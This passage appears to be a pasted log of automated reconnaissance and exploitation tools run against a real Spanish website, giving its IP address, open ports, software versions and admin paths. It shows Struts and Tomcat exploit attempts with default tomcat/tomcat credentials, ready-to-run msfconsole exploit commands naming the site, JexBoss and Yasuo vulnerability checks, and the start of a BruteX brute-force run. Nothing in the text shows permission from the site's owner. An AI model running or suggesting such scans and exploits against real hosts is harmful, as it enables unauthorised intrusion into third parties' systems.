  1282. Aggressive OS guesses: Linux 3.10 (92%), Linux 3.4 - 3.10 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 (90%), Linux 3.11 (90%), Linux 3.5 (90%), Synology DiskStation Manager 5.2-5644 (90%), Crestron XPanel control system (90%)
  1283. No exact OS matches for host (test conditions non-ideal).
  1284. Network Distance: 8 hops
  1285.  
  1286. TRACEROUTE (using port 389/tcp)
  1287. HOP RTT ADDRESS
  1288. 1 103.68 ms 10.251.200.1
  1289. 2 103.73 ms 185.94.189.129
  1290. 3 ...
  1291. 4 171.68 ms 94.23.122.146
  1292. 5 ...
  1293. 6 114.25 ms 94.23.122.73
  1294. 7 ...
  1295. 8 113.66 ms 91.121.2.184
  1296. #######################################################################################################################################
  1297.  
  1298. ^ ^
  1299. _ __ _ ____ _ __ _ _ ____
  1300. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1301. | V V // o // _/ | V V // 0 // 0 // _/
  1302. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1303. <
  1304. ...'
  1305.  
  1306. WAFW00F - Web Application Firewall Detection Tool
  1307.  
  1308. By Sandro Gauci && Wendel G. Henrique
  1309.  
  1310. Checking https://falange-autentica.es
  1311. The site https://falange-autentica.es is behind a ModSecurity (OWASP CRS)
  1312. Number of requests: 11
  1313. #######################################################################################################################################
  1314. https://falange-autentica.es [200 OK] Apache, Cookies[2b5581ae182de78f0daf6795785a3ed8], Country[FRANCE][FR], Email[contactar@falange-autentica.es], Frame, HTML5, HTTPServer[Apache], HttpOnly[2b5581ae182de78f0daf6795785a3ed8], IP[91.121.2.184], MetaGenerator[Joomla! - Open Source Content Management], OpenSearch[https://falange-autentica.es/component/search/?Itemid=101&amp;format=opensearch], PHP[5.6.14], Script[application/json,text/javascript], Title[Falange Auténtica], X-Powered-By[PHP/5.6.14], YouTube
  1315. #######################################################################################################################################
  1316.  
  1317. wig - WebApp Information Gatherer
  1318.  
  1319.  
  1320. Scanning https://falange-autentica.es...
  1321. ___________________________________________ SITE INFO ___________________________________________
  1322. IP Title
  1323. 91.121.2.184 Falange Auténtica
  1324.  
  1325. ____________________________________________ VERSION ____________________________________________
  1326. Name Versions Type
  1327. Joomla! 3 | 3.3.1 | 3.3.1.rc | 3.3.2 | 3.3.2.rc | 3.3.3 | 3.3.4 CMS
  1328. 3.3.5 | 3.3.6 | 3.4.0 | 3.4.0-alpha | 3.4.0-beta1
  1329. 3.4.0-beta2 | 3.4.0-beta3 | 3.4.0-rc | 3.4.1 | 3.4.1-rc
  1330. 3.4.1-rc2 | 3.4.2 | 3.4.2-rc | 3.4.3 | 3.4.4 | 3.4.4-rc
  1331. 3.4.4-rc2 | 3.4.5 | 3.4.6 | 3.4.7 | 3.4.8 | 3.4.8-rc | 3.5.0
  1332. 3.5.0-beta | 3.5.0-beta2 | 3.5.0-beta3 | 3.5.0-beta4
  1333. 3.5.0-beta5 | 3.5.0-rc | 3.5.0-rc2 | 3.5.0-rc3 | 3.5.0-rc4
  1334. 3.5.1 | 3.5.1-rc | 3.5.1-rc2 | 3.6.0 | 3.6.0-alpha
  1335. 3.6.0-beta1 | 3.6.0-beta2 | 3.6.0-rc | 3.6.0-rc2 | 3.6.1
  1336. 3.6.1-rc1 | 3.6.1-rc2 | 3.6.2 | 3.6.3-rc1
  1337. Apache Platform
  1338. PHP 5.6.14 Platform
  1339. openSUSE tumbleweed OS
  1340.  
  1341. __________________________________________ INTERESTING __________________________________________
  1342. URL Note Type
  1343. /robots.txt robots.txt index Interesting
  1344.  
  1345. _____________________________________________ TOOLS _____________________________________________
  1346. Name Link Software
  1347. CMSmap https://github.com/Dionach/CMSmap Joomla!
  1348. joomscan http://sourceforge.net/projects/joomscan/ Joomla!
  1349.  
  1350. _________________________________________________________________________________________________
  1351. Time: 75.5 sec Urls: 431 Fingerprints: 40401
  1352. #######################################################################################################################################
  1353. HTTP/1.1 200 OK
  1354. Date: Wed, 07 Nov 2018 22:37:24 GMT
  1355. Server: Apache
  1356. X-Powered-By: PHP/5.6.14
  1357. Set-Cookie: 2b5581ae182de78f0daf6795785a3ed8=3qo5damo2no5e2i033rrjhmpq7; path=/; HttpOnly
  1358. Expires: Wed, 17 Aug 2005 00:00:00 GMT
  1359. Last-Modified: Wed, 07 Nov 2018 22:37:25 GMT
  1360. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  1361. Pragma: no-cache
  1362. Vary: Accept-Encoding
  1363. Content-Type: text/html; charset=utf-8
  1364. #######################################################################################################################################
  1365.  
  1366.  
  1367. AVAILABLE PLUGINS
  1368. -----------------
  1369.  
  1370. PluginHeartbleed
  1371. PluginHSTS
  1372. PluginCompression
  1373. PluginSessionRenegotiation
  1374. PluginChromeSha1Deprecation
  1375. PluginOpenSSLCipherSuites
  1376. PluginSessionResumption
  1377. PluginCertInfo
  1378.  
  1379.  
  1380.  
  1381. CHECKING HOST(S) AVAILABILITY
  1382. -----------------------------
  1383.  
  1384. falange-autentica.es:443 => 91.121.2.184:443
  1385.  
  1386.  
  1387.  
  1388. SCAN RESULTS FOR FALANGE-AUTENTICA.ES:443 - 91.121.2.184:443
  1389. ------------------------------------------------------------
  1390.  
  1391. * Deflate Compression:
  1392. OK - Compression disabled
  1393.  
  1394. * Session Renegotiation:
  1395. Client-initiated Renegotiations: OK - Rejected
  1396. Secure Renegotiation: OK - Supported
  1397.  
  1398. * Certificate - Content:
  1399. SHA1 Fingerprint: 4b82cef8595e0e573a3568c86ce18df4a0cfb877
  1400. Common Name: falange-autentica.es
  1401. Issuer: Let's Encrypt Authority X3
  1402. Serial Number: 03B467C49D12782AA2B693ECFF0B1C9EC555
  1403. Not Before: Oct 2 06:11:20 2018 GMT
  1404. Not After: Dec 31 06:11:20 2018 GMT
  1405. Signature Algorithm: sha256WithRSAEncryption
  1406. Public Key Algorithm: rsaEncryption
  1407. Key Size: 2048 bit
  1408. Exponent: 65537 (0x10001)
  1409. X509v3 Subject Alternative Name: {'DNS': ['falange-autentica.es']}
  1410.  
  1411. * Certificate - Trust:
  1412. Hostname Validation: OK - Subject Alternative Name matches
  1413. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  1414. Java 6 CA Store (Update 65): OK - Certificate is trusted
  1415. Microsoft CA Store (09/2015): OK - Certificate is trusted
  1416. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  1417. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  1418. Certificate Chain Received: ['falange-autentica.es', 'falange-autentica.es', "Let's Encrypt Authority X3"]
  1419.  
  1420. * Certificate - OCSP Stapling:
  1421. NOT SUPPORTED - Server did not send back an OCSP response.
  1422.  
  1423. * Session Resumption:
  1424. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1425. With TLS Session Tickets: OK - Supported
  1426.  
  1427. * SSLV2 Cipher Suites:
  1428. Server rejected all cipher suites.
  1429.  
  1430. * SSLV3 Cipher Suites:
  1431. Server rejected all cipher suites.
  1432.  
  1433.  
  1434.  
  1435. SCAN COMPLETED IN 2.41 S
  1436. ------------------------
  1437. Version: 1.11.12-static
  1438. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1439.  
  1440. Connected to 91.121.2.184
  1441.  
  1442. Testing SSL server falange-autentica.es on port 443 using SNI name falange-autentica.es
  1443.  
  1444. TLS Fallback SCSV:
  1445. Server supports TLS Fallback SCSV
  1446.  
  1447. TLS renegotiation:
  1448. Secure session renegotiation supported
  1449.  
  1450. TLS Compression:
  1451. Compression disabled
  1452.  
  1453. Heartbleed:
  1454. TLS 1.2 not vulnerable to heartbleed
  1455. TLS 1.1 not vulnerable to heartbleed
  1456. TLS 1.0 not vulnerable to heartbleed
  1457.  
  1458. Supported Server Cipher(s):
  1459. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1460. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1461. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1462. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1463. Accepted TLSv1.2 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
  1464. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1465. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1466. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
  1467. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
  1468. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  1469. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  1470. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
  1471. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
  1472. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  1473. Accepted TLSv1.2 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
  1474. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  1475. Accepted TLSv1.2 128 bits RC4-SHA
  1476. Preferred TLSv1.1 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
  1477. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1478. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1479. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  1480. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  1481. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  1482. Accepted TLSv1.1 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
  1483. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  1484. Accepted TLSv1.1 128 bits RC4-SHA
  1485. Preferred TLSv1.0 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
  1486. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1487. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1488. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  1489. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  1490. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  1491. Accepted TLSv1.0 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
  1492. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  1493. Accepted TLSv1.0 128 bits RC4-SHA
  1494.  
  1495. SSL Certificate:
  1496. Signature Algorithm: sha256WithRSAEncryption
  1497. RSA Key Strength: 2048
  1498.  
  1499. Subject: falange-autentica.es
  1500. Altnames: DNS:falange-autentica.es
  1501. Issuer: Let's Encrypt Authority X3
  1502.  
  1503. Not valid before: Oct 2 06:11:20 2018 GMT
  1504. Not valid after: Dec 31 06:11:20 2018 GMT
  1505. #######################################################################################################################################
  1506.  
  1514.  
  1515. WAFW00F - Web Application Firewall Detection Tool
  1516.  
  1517. By Sandro Gauci && Wendel G. Henrique
  1518.  
  1519. Checking http://falange-autentica.es:8080
  1520.  
  1521. http://falange-autentica.es:8080 [ Unassigned]
  1522.  
  1523. Version: 1.11.12-static
  1524. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1525.  
  1526. Connected to 91.121.2.184
  1527.  
  1528. Testing SSL server falange-autentica.es on port 8080 using SNI name falange-autentica.es
  1529.  
  1530. TLS Fallback SCSV:
  1531. Server does not support TLS Fallback SCSV
  1532.  
  1533. TLS renegotiation:
  1534. Session renegotiation not supported
  1535.  
  1536. TLS Compression:
  1537. Compression disabled
  1538.  
  1539. Heartbleed:
  1540. TLS 1.2 not vulnerable to heartbleed
  1541. TLS 1.1 not vulnerable to heartbleed
  1542. TLS 1.0 not vulnerable to heartbleed
  1543.  
  1544. Supported Server Cipher(s):
  1545. ====================================================================================
  1546. RUNNING APACHE STRUTS CVE-2017-5638 VULN SCAN
  1547. ====================================================================================
  1548. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:38 EST
  1549. ====================================================================================
  1550. RUNNING APACHE STRUTS 2 REST PLUGIN XSTREAM RCE VULN CHECK
  1551. ====================================================================================
  1552. [*] If you see a 200 response code below, try running 'msfconsole -q -x "multi/http/struts2_rest_xstream; set RHOST "falange-autentica.es"; exploit -j; exit;
  1553. RUNNING APACHE STRUTS JAKARTA RCE VULN CHECK
  1554. ====================================================================================
  1555. [*] If you see a 200 response code below, try running 'msfconsole -q -x "multi/http/struts2_content_type_ognl; set RHOST "falange-autentica.es"; exploit -j; exit;
  1556. ====================================================================================
  1557. RUNNING APACHE TOMCAT EXPLOITS
  1558. ====================================================================================
  1559. RHOSTS => falange-autentica.es
  1560. RHOST => falange-autentica.es
  1561. [-] WAR file not found
  1562. [*] Auxiliary module execution completed
  1563. [*] Scanned 1 of 1 hosts (100% complete)
  1564. [*] Auxiliary module execution completed
  1565. RPORT => 8080
  1566. [*] Scanned 1 of 1 hosts (100% complete)
  1567. [*] Auxiliary module execution completed
  1568. [*] Attempting to connect to 91.121.2.184:8080
  1569. [*] Scanned 1 of 1 hosts (100% complete)
  1570. [*] Auxiliary module execution completed
  1571. [*] http://91.121.2.184:8080/admin/j_security_check - Checking j_security_check...
  1572. [*] Scanned 1 of 1 hosts (100% complete)
  1573. [*] Auxiliary module execution completed
  1574. [*] Scanned 1 of 1 hosts (100% complete)
  1575. [*] Auxiliary module execution completed
  1576. [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
  1577. [*] Exploit completed, but no session was created.
  1578. USERNAME => tomcat
  1579. PASSWORD => tomcat
  1580. [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
  1581. [*] Exploit completed, but no session was created.
  1582. #######################################################################################################################################
  1583.  
  1584.  
  1585.  
  1586. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  1587. | * And others Java Deserialization Vulnerabilities * |
  1588. | |
  1589. | @author: João Filho Matos Figueiredo |
  1590. | @contact: joaomatosf@gmail.com |
  1591. | |
  1592. | @update: https://github.com/joaomatosf/jexboss |
  1593. #______________________________________________________#
  1594.  
  1595. @version: 1.2.4
  1596.  
  1597. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  1598.  
  1599.  
  1600. ** Checking Host: http://falange-autentica.es:8080 **
  1601.  
  1602. [*] Checking admin-console:
  1603. * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: /admin-console//github.com/joaomatosf/jexboss (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
  1604.  
  1605. [*] Checking Struts2:
  1606. * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
  1607.  
  1608. [*] Checking Servlet Deserialization:
  1609. * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
  1610.  
  1611. [*] Checking Application Deserialization:
  1612. * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
  1613.  
  1614. [*] Checking Jenkins:
  1615. * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
  1616.  
  1617. [*] Checking web-console: [ ERROR ]
  1618. * The server http://falange-autentica.es:8080 is not an HTTP server.
  1619.  
  1620.  
  1621.  
  1622. * Results:
  1623. The server is not vulnerable to bugs tested ... :D
  1624.  
  1625. * Info: review, suggestions, updates, etc:
  1626. https://github.com/joaomatosf/jexboss
  1627.  
  1630.  
  1631. #######################################################################################################################################
  1632.  
  1633. I, [2018-11-07T17:38:52.807771 #18562] INFO -- : Initiating port scan
  1634. I, [2018-11-07T17:39:41.499183 #18562] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-07_17-38-52.xml
  1635. I, [2018-11-07T17:39:41.500279 #18562] INFO -- : Discovered open port: 91.121.2.184:80
  1636. I, [2018-11-07T17:39:42.184442 #18562] INFO -- : Discovered open port: 91.121.2.184:443
  1637. I, [2018-11-07T17:39:43.563216 #18562] INFO -- : Discovered open port: 91.121.2.184:465
  1638. I, [2018-11-07T17:39:50.498987 #18562] INFO -- : Discovered open port: 91.121.2.184:993
  1639. I, [2018-11-07T17:39:50.969259 #18562] INFO -- : Discovered open port: 91.121.2.184:60443
  1640. I, [2018-11-07T17:39:52.467275 #18562] INFO -- : <<<Enumerating vulnerable applications>>>
  1641.  
  1642.  
  1643. --------------------------------------------------------
  1644. <<<Yasuo discovered following vulnerable applications>>>
  1645. --------------------------------------------------------
  1646. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
  1647. | App Name | URL to Application | Potential Exploit | Username | Password |
  1648. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
  1649. | Plixer Scrutinizer NetFlow | http://91.121.2.184:80/cgi-bin/admin.cgi | ./auxiliary/admin/http/scrutinizer_add_user.rb | | |
  1650. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
  1651. #######################################################################################################################################
  1652. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:42 EST
  1653. NSE: Loaded 148 scripts for scanning.
  1654. NSE: Script Pre-scanning.
  1655. Initiating NSE at 17:42
  1656. Completed NSE at 17:42, 0.00s elapsed
  1657. Initiating NSE at 17:42
  1658. Completed NSE at 17:42, 0.00s elapsed
  1659. Initiating Parallel DNS resolution of 1 host. at 17:42
  1660. Completed Parallel DNS resolution of 1 host. at 17:43, 16.50s elapsed
  1661. Initiating SYN Stealth Scan at 17:43
  1662. Scanning falange-autentica.es (91.121.2.184) [474 ports]
  1663. Discovered open port 993/tcp on 91.121.2.184
  1664. Discovered open port 80/tcp on 91.121.2.184
  1665. Discovered open port 443/tcp on 91.121.2.184
  1666. Discovered open port 22/tcp on 91.121.2.184
  1667. Discovered open port 8080/tcp on 91.121.2.184
  1668. Discovered open port 465/tcp on 91.121.2.184
  1669. Discovered open port 389/tcp on 91.121.2.184
  1670. Discovered open port 7071/tcp on 91.121.2.184
  1671. Completed SYN Stealth Scan at 17:43, 4.79s elapsed (474 total ports)
  1672. Initiating Service scan at 17:43
  1673. Scanning 8 services on falange-autentica.es (91.121.2.184)
  1674. Completed Service scan at 17:43, 21.27s elapsed (8 services on 1 host)
  1675. Initiating OS detection (try #1) against falange-autentica.es (91.121.2.184)
  1676. Retrying OS detection (try #2) against falange-autentica.es (91.121.2.184)
  1677. Initiating Traceroute at 17:43
  1678. Completed Traceroute at 17:43, 0.12s elapsed
  1679. Initiating Parallel DNS resolution of 2 hosts. at 17:43
  1680. Completed Parallel DNS resolution of 2 hosts. at 17:43, 16.50s elapsed
  1681. NSE: Script scanning 91.121.2.184.
  1682. Initiating NSE at 17:43
  1683. Completed NSE at 17:46, 181.15s elapsed
  1684. Initiating NSE at 17:46
  1685. Completed NSE at 17:46, 1.13s elapsed
  1686. Nmap scan report for falange-autentica.es (91.121.2.184)
  1687. Host is up (0.11s latency).
  1688. Not shown: 463 filtered ports
  1689. PORT STATE SERVICE VERSION
  1690. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  1691. | ssh-hostkey:
  1692. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
  1693. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
  1694. 25/tcp closed smtp
  1695. 80/tcp open http Apache httpd (PHP 5.6.14)
  1696. |_http-favicon: Unknown favicon MD5: DCE399F4B8AE42FFF4346099CFD7C983
  1697. |_http-generator: Joomla! - Open Source Content Management
  1698. | http-methods:
  1699. |_ Supported Methods: GET HEAD POST OPTIONS
  1700. | http-robots.txt: 15 disallowed entries
  1701. | /joomla/administrator/ /administrator/ /bin/ /cache/
  1702. | /cli/ /components/ /includes/ /installation/ /language/
  1703. |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
  1704. |_http-server-header: Apache
  1705. |_http-title: Falange Aut\xC3\xA9ntica
  1706. 139/tcp closed netbios-ssn
  1707. 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
  1708. | ssl-cert: Subject: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
  1709. | Issuer: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
  1710. | Public Key type: rsa
  1711. | Public Key bits: 1024
  1712. | Signature Algorithm: sha1WithRSAEncryption
  1713. | Not valid before: 2013-12-09T09:57:56
  1714. | Not valid after: 2018-12-08T09:57:56
  1715. | MD5: 922f 71f8 2bf1 f953 ff2f 28d6 903f a524
  1716. |_SHA-1: 5aa2 2e6f 9c8b 2556 b75c 87e0 f34a c1ce 2ee3 85a1
  1717. |_ssl-date: TLS randomness does not represent time
  1718. 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
  1719. | http-methods:
  1720. |_ Supported Methods: GET HEAD
  1721. | http-robots.txt: 15 disallowed entries
  1722. | /joomla/administrator/ /administrator/ /bin/ /cache/
  1723. | /cli/ /components/ /includes/ /installation/ /language/
  1724. |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
  1725. |_http-server-header: Apache
  1726. | ssl-cert: Subject: commonName=falange-autentica.es
  1727. | Subject Alternative Name: DNS:falange-autentica.es
  1728. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  1729. | Public Key type: rsa
  1730. | Public Key bits: 2048
  1731. | Signature Algorithm: sha256WithRSAEncryption
  1732. | Not valid before: 2018-10-02T06:11:20
  1733. | Not valid after: 2018-12-31T06:11:20
  1734. | MD5: e93b 6570 be85 20b1 cccc 0345 2d30 5948
  1735. |_SHA-1: 4b82 cef8 595e 0e57 3a35 68c8 6ce1 8df4 a0cf b877
  1736. |_ssl-date: 2018-11-07T22:43:52+00:00; 0s from scanner time.
  1737. 445/tcp closed microsoft-ds
  1738. 465/tcp open ssl/smtps?
  1739. |_smtp-commands: Couldn't establish connection on port 465
  1740. |_ssl-date: TLS randomness does not represent time
  1741. 993/tcp open ssl/imaps?
  1742. |_ssl-date: TLS randomness does not represent time
  1743. 7071/tcp open ssl/iwg1?
  1744. |_ssl-date: 2018-11-07T22:43:48+00:00; 0s from scanner time.
  1745. 8080/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  1746. | ssh-hostkey:
  1747. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
  1748. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
  1749. Device type: general purpose|storage-misc|router|media device|WAP|broadband router
  1750. Running (JUST GUESSING): Linux 2.6.X|3.X (94%), HP embedded (91%), MikroTik RouterOS 6.X (90%), Infomir embedded (90%), Ubiquiti embedded (90%), Ubiquiti AirOS 5.X (90%)
  1751. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/o:mikrotik:routeros:6.30 cpe:/o:linux:linux_kernel:2.6 cpe:/h:infomir:mag-250 cpe:/h:ubnt:airmax_nanostation cpe:/o:ubnt:airos:5.5.9
  1752. Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.32 - 3.1 (94%), Linux 2.6.32 - 3.13 (94%), Linux 2.6.32 - 2.6.39 (92%), Linux 2.6.39 (92%), Linux 3.10 (92%), Linux 3.2 (92%), HP P2000 G3 NAS device (91%), Linux 3.5 (91%), Linux 3.8 (91%)
  1753. No exact OS matches for host (test conditions non-ideal).
  1754. Uptime guess: 21.266 days (since Wed Oct 17 12:24:18 2018)
  1755. Network Distance: 2 hops
  1756. TCP Sequence Prediction: Difficulty=257 (Good luck!)
  1757. IP ID Sequence Generation: All zeros
  1758.  
  1759. TRACEROUTE (using port 445/tcp)
  1760. HOP RTT ADDRESS
  1761. 1 107.07 ms 10.251.200.1
  1762. 2 106.90 ms 91.121.2.184
  1763.  
  1764. NSE: Script Post-scanning.
  1765. Initiating NSE at 17:46
  1766. Completed NSE at 17:46, 0.00s elapsed
  1767. Initiating NSE at 17:46
  1768. Completed NSE at 17:46, 0.00s elapsed
  1769. Read data files from: /usr/bin/../share/nmap
  1770. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1771. Nmap done: 1 IP address (1 host up) scanned in 247.58 seconds
  1772. Raw packets sent: 1028 (49.416KB) | Rcvd: 3952 (2.351MB)
  1773. #######################################################################################################################################
  1774. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:46 EST
  1775. NSE: Loaded 148 scripts for scanning.
  1776. NSE: Script Pre-scanning.
  1777. Initiating NSE at 17:46
  1778. Completed NSE at 17:46, 0.00s elapsed
  1779. Initiating NSE at 17:46
  1780. Completed NSE at 17:46, 0.00s elapsed
  1781. Initiating Parallel DNS resolution of 1 host. at 17:46
  1782. Completed Parallel DNS resolution of 1 host. at 17:47, 16.50s elapsed
  1783. Initiating UDP Scan at 17:47
  1784. Scanning falange-autentica.es (91.121.2.184) [14 ports]
  1785. Completed UDP Scan at 17:47, 2.83s elapsed (14 total ports)
  1786. Initiating Service scan at 17:47
  1787. Scanning 12 services on falange-autentica.es (91.121.2.184)
  1788. Service scan Timing: About 8.33% done; ETC: 18:06 (0:17:58 remaining)
  1789. Completed Service scan at 17:48, 102.58s elapsed (12 services on 1 host)
  1790. Initiating OS detection (try #1) against falange-autentica.es (91.121.2.184)
  1791. Retrying OS detection (try #2) against falange-autentica.es (91.121.2.184)
  1792. Initiating Traceroute at 17:48
  1793. Completed Traceroute at 17:49, 7.18s elapsed
  1794. Initiating Parallel DNS resolution of 1 host. at 17:49
  1795. Completed Parallel DNS resolution of 1 host. at 17:49, 16.50s elapsed
  1796. NSE: Script scanning 91.121.2.184.
  1797. Initiating NSE at 17:49
  1798. Completed NSE at 17:49, 20.38s elapsed
  1799. Initiating NSE at 17:49
  1800. Completed NSE at 17:49, 1.03s elapsed
  1801. Nmap scan report for falange-autentica.es (91.121.2.184)
  1802. Host is up (0.11s latency).
  1803.  
  1804. PORT STATE SERVICE VERSION
  1805. 53/udp open|filtered domain
  1806. 67/udp open|filtered dhcps
  1807. 68/udp open|filtered dhcpc
  1808. 69/udp open|filtered tftp
  1809. 88/udp open|filtered kerberos-sec
  1810. 123/udp open|filtered ntp
  1811. 137/udp filtered netbios-ns
  1812. 138/udp filtered netbios-dgm
  1813. 139/udp open|filtered netbios-ssn
  1814. 161/udp open|filtered snmp
  1815. 162/udp open|filtered snmptrap
  1816. 389/udp open|filtered ldap
  1817. 520/udp open|filtered route
  1818. 2049/udp open|filtered nfs
  1819. Too many fingerprints match this host to give specific OS details
  1820.  
  1821. TRACEROUTE (using port 137/udp)
  1822. HOP RTT ADDRESS
  1823. 1 107.78 ms 10.251.200.1
  1824. 2 ... 3
  1825. 4 105.57 ms 10.251.200.1
  1826. 5 108.54 ms 10.251.200.1
  1827. 6 108.53 ms 10.251.200.1
  1828. 7 108.52 ms 10.251.200.1
  1829. 8 108.51 ms 10.251.200.1
  1830. 9 108.50 ms 10.251.200.1
  1831. 10 108.50 ms 10.251.200.1
  1832. 11 ... 18
  1833. 19 105.15 ms 10.251.200.1
  1834. 20 102.11 ms 10.251.200.1
  1835. 21 ... 28
  1836. 29 106.62 ms 10.251.200.1
  1837. 30 106.29 ms 10.251.200.1
  1838.  
  1839. NSE: Script Post-scanning.
  1840. Initiating NSE at 17:49
  1841. Completed NSE at 17:49, 0.00s elapsed
  1842. Initiating NSE at 17:49
  1843. Completed NSE at 17:49, 0.00s elapsed
  1844. Read data files from: /usr/bin/../share/nmap
  1845. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1846. Nmap done: 1 IP address (1 host up) scanned in 171.03 seconds
  1847. Raw packets sent: 135 (11.658KB) | Rcvd: 5025 (1.563MB)
  1848. #######################################################################################################################################
  1855.  
  1856. + -- --=[BruteX v1.7 by 1N3
  1857. + -- --=[http://crowdshield.com
  1858.  
  1859.  
  1860. ################################### Running Port Scan #################################################################################
  1861. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:49 EST
  1862. Nmap scan report for falange-autentica.es (91.121.2.184)
  1863. Host is up (0.11s latency).
  1864. Not shown: 17 filtered ports, 3 closed ports
